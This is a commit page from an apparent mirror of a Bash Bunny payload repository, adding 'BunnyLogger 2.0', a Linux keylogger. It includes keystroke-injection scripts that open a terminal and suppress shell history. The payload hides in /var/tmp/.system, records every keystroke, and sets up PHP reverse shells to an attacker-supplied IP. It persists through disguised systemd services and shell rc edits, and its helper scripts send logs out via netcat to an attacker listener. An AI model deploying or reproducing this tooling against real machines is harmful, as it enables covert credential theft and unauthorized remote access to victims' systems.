hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Uploading BunnyLogger 2.0

pull/545/head
drapl0n 2022-08-22 19:01:58 +05:30 committed by GitHub
parent 600c65bf40
commit 38bbd9ac7e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9 changed files with 366 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
payloads/library/credentials/BunnyLogger2.0/README.md Normal file
View File

@ -0,0 +1,39 @@
## About:
* Title: BunnyLogger 2.0
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker.
### Features:
* Live keystroke capturing.
* Stored Keystroke capturing.
* Bunny Logger Manager: Interactive TUI Dashboard.
* Detailed key logs.
* Persistent.
* Autostart payload on boot.
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ------------------------------ |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| requirements/* | /payloads/library/bunnyLogger2 |
### LED Status:
* `LED SETUP` : MAGENTA
* `LED ATTACK` : YELLOW
* `LED FINISH` : GREEN
### Usage:
* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh`
* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager.
#### Support me if you like my work:
* https://twitter.com/drapl0n

191
payloads/library/credentials/BunnyLogger2.0/bunnyLoggerMgr Normal file
View File

@ -0,0 +1,191 @@
#!/bin/bash
allowAbort=true;
myInterruptHandler()
{
if $allowAbort; then
echo
echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1;
fi;
}
trap myInterruptHandler SIGINT
echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m"
echo
echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs."
echo
read -p "Enter your choice: " ch
create(){
read -p "Enter Target's name(without whitespaces): " name
if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists."
exit 1
fi
read -p "Enter Servers IP: " ip
read -p "Enter Unique Port Number(1500-65535): " port
read -p "Enter another Unique Port Number(1500-65535): " secPort
if [ "$port" == "$secPort" ]; then
echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar."
exit 1
fi
if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"."
exit 1
fi
max=65535
min=1500
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then
read -p "Specify directory for output: " dir
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
cp -r ~/.config/bunnyLogger/payload.sh $dir
fi
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh
sed -i -e "s/4444/$port/g" $dir/payload.sh
sed -i -e "s/5555/$secPort/g" $dir/payload.sh
echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"."
exit 1
fi
}
list(){
column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}'
}
remove(){
echo
list
echo
read -p "Enter name of target to remove: " rmv
if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then
sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found."
fi
}
update(){
echo
list
echo
read -p "Choose target number: " cho
read -p "You want to update (ip|portOne|portTwo): " ent
if [ "$ent" = ip ]
then
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
read -p "Enter new ip: " use
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"."
exit
fi
elif [ "$ent" = portOne ]
then
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
read -p "Enter new Port number: " useP
max=65535
min=1500
if (( $useP <= $max )) && (( $useP >= $min )); then
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
fi
elif [ "$ent" = portTwo ]
then
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
read -p "Enter new Port number: " useP
max=65535
min=1500
if (( $useP <= $max )) && (( $useP >= $min )); then
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
fi
else
echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"."
fi
}
fetch(){
echo
list
echo
read -p "Enter Target number to connect: " cho
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
echo -en "1] Live Capture \t2]Fetch Stored Logs: "
read typ
case $typ in
1)
read -p "Specify directory for output: " dir
read -p "Enter filename to store logs: " filename
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."
nc -lvp $two > $dir/$filename.log
fi
;;
2)
read -p "Specify directory for output: " dir
read -p "Enter filename to store logs: " filename
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
nc -lvp 1444 > $dir/$filename.log &
nc -lvp $three
fi
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.."
;;
esac
}
decode(){
echo -e "1] Normal Decode \t2] Informative Decode"
read -p "Enter your choice: " cho
read -p "Enter path of file to decode: " path
read -p "Enter path for decoded log: " out
case $cho in
1)
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out
;;
2)
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"."
;;
esac
}
case $ch in
1)
fetch
;;
2)
create
;;
3)
list
;;
4)
update
;;
5)
remove
;;
6)
decode
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"."
;;
esac

7
payloads/library/credentials/BunnyLogger2.0/install.sh Normal file
View File

@ -0,0 +1,7 @@
#!/bin/bash
path=~/.config/bunnyLogger
mkdir $path
cp payload.sh $path
touch $path/bunnyLogger.db
chmod +x bunnyLoggerMgr
sudo cp bunnyLoggerMgr /usr/local/bin/

28
payloads/library/credentials/BunnyLogger2.0/payload.sh Normal file
View File

@ -0,0 +1,28 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir -p /var/tmp/.system/logs
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/
cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/
chmod +x /var/tmp/.system/nc
echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/clctrl
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/credentials/BunnyLogger2.0/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

41
payloads/library/credentials/BunnyLogger2.0/requirements/clctrl Normal file
View File

@ -0,0 +1,41 @@
#!/bin/bash
transfer(){
echo -e "\033[1;34m[INFO]: Target Logs:\033[0m"
cd /var/tmp/.system/logs/
ls /var/tmp/.system/logs/ | sort
echo
echo -n "Enter filename to transfer: "
read ch
if [ -f $ch ];
then
echo -e "\033[1;34m[INFO]: Transferring file...\033[0m"
/var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m"
else
echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m"
fi
else
echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m"
fi
}
conti(){
while :
do
echo
echo -n "Would you like to transfer more files? [Y/N]: "
read ch
if [ "$ch" = y ] || [ "$ch" = Y ];
then
transfer
elif [ "$ch" = N ] || [ "$ch" = n ];
then
echo -e "\033[1;34m[INFO]: Terminating...\033[0m"
break
else
echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m"
fi
done
}
transfer
conti

BIN
payloads/library/credentials/BunnyLogger2.0/requirements/nc Normal file
View File

Binary file not shown.

BIN
payloads/library/credentials/BunnyLogger2.0/requirements/xinput Normal file
View File

Binary file not shown.

4
payloads/library/credentials/BunnyLogger2.0/uninstall.sh Normal file
View File

@ -0,0 +1,4 @@
#!/bin/bash
path=~/.config/bunnyLogger
rm -rf $path
sudo rm /usr/local/bin/bunnyLoggerMgr